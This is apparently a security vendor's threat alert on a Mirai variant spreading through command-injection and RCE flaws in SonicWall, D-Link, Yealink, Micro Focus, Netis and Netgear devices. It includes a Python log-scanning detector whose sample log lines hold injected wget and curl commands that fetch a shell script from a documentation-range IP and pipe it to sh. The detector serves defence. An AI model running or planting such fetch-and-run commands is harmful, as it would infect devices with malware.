
Rewterz Threat Alert – New Mirai Variant Targeting New IoT Vulnerabilities, Network Security Devices

Severity

High

Analysis Summary

Five known vulnerabilities are being actively exploited to deliver a Mirai variant. The attacks are ongoing: after successful exploitation, the attackers attempt to download a malicious shell script that carries out the next stages of the infection, such as downloading and executing Mirai variants and brute-forcers.
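The common step in every case above is the post-exploitation download of a shell script. The following is an added detection example, not Rewterz's or the original researchers' code: it parses web-server access logs and flags requests whose decoded parameters carry a fetch-and-run sequence (a download tool, a remote URL, and a shell invocation together). The log lines, IP addresses and URIs are constructed for illustration; no actual payload for the listed CVEs is reproduced.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Combined Log Format (not real traffic). Two of
# the requests carry a generic fetch-and-run sequence in a query parameter.
SAMPLE_LOG = """\
203.0.113.10 - - [16/Mar/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [16/Mar/2021:10:01:05 +0000] "GET /cgi-bin/status.cgi?host=;wget+http://198.51.100.5/bins.sh+-O+/tmp/x;sh+/tmp/x HTTP/1.1" 200 0 "-" "curl/7.64.1"
203.0.113.12 - - [16/Mar/2021:10:01:09 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.13 - - [16/Mar/2021:10:01:12 +0000] "GET /search?q=curl%20-fsSL%20http%3A%2F%2F198.51.100.5%2Fm.sh%7Csh HTTP/1.1" 404 0 "-" "python-requests/2.25"
"""

# Minimal Combined Log Format parser: client IP, timestamp, method, URI, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)

# Three independent indicators; a request is flagged only when all three are
# present after URL-decoding, which keeps ordinary searches and form posts quiet.
INDICATORS = {
    "fetch_tool": re.compile(r"\b(wget|curl|tftp)\b", re.I),
    "remote_url": re.compile(r"\b(https?|ftp)://", re.I),
    "shell_exec": re.compile(r"(?:^|[;|&`\s])(sh|bash|busybox)\b|\bchmod\s+(\+x|[0-7]{3})", re.I),
}


def decode_uri(uri):
    """URL-decode twice: double encoding is a common way to slip past naive filters."""
    return unquote_plus(unquote_plus(uri))


def classify_request(uri):
    """Return the names of the indicators matched by this request URI."""
    decoded = decode_uri(uri)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def scan_log(log_text):
    """Parse each access-log line and report requests that match every indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production pipeline would count these
        hits = classify_request(m["uri"])
        if len(hits) == len(INDICATORS):
            findings.append({
                "ip": m["ip"],
                "timestamp": m["ts"],
                "status": int(m["status"]),
                "decoded_uri": decode_uri(m["uri"]),
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['status']} {f['decoded_uri']}")
```

Requiring all three indicators is deliberate: a search for "curl" or a link to an external URL on its own is normal traffic, and flagging on any single token would bury the real hits. The HTTP status is kept in each finding because a 200 on a request like the second sample line is the one worth escalating first, while a 404 still shows which devices are being probed.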

The vulnerabilities being exploited include:

  • VisualDoor – a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January
  • CVE-2020-25506 – a D-Link DNS-320 firewall remote code execution (RCE) vulnerability
  • CVE-2021-27561 and CVE-2021-27562 – two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges
  • CVE-2021-22502 – an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40
  • CVE-2019-19356 – a Netis WF2419 wireless router RCE exploit, and
  • CVE-2020-26919 – a Netgear ProSAFE Plus RCE vulnerability

Payloads of Exploits

1. VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability

VisualDoor SonicWall SSL-VPN exploit payload.

2. CVE-2020-25506: D-Link DNS-320 Firewall Remote Command Execution Vulnerability

D-Link DNS-320 exploit payload.

3. CVE-2021-27561 and CVE-2021-27562: Yealink Device Management Pre-Auth ‘root’ Level Remote Code Execution Vulnerability

Yealink Device Management exploit payload. We observed one of the IPs involved in the attack leveraging CVE-2021-27561 and CVE-2021-27562 to serve a Mirai variant.

4. CVE-2021-22502: Micro Focus Operation Bridge Reporter (OBR) Remote Code Execution

Micro Focus Operation Bridge Reporter exploit payload.

5. CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution Vulnerability

Netis WF2419 exploit payload.

Impact

  • Remote code execution
  • Command Injection
  • Pre-Auth ‘root’ Level Remote Code Execution

Affected Vendors

  • Sonicwall
  • D-Link
  • Netgear
  • Netis
  • Yealink

Remediation

  • Customers are strongly advised to apply the vendor patches for the vulnerabilities listed above as soon as possible.
  • Filter malicious URLs and malicious domains at the network perimeter.
  • Search for the related IOCs in your environment.